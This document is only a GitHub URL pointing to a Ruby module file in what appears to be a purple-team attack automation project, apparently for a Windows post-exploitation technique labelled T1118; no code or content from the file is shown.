https://github.com/praetorian-code/purple-team-attack-automation/blob/master/modules/post/windows/purple/t1118.rb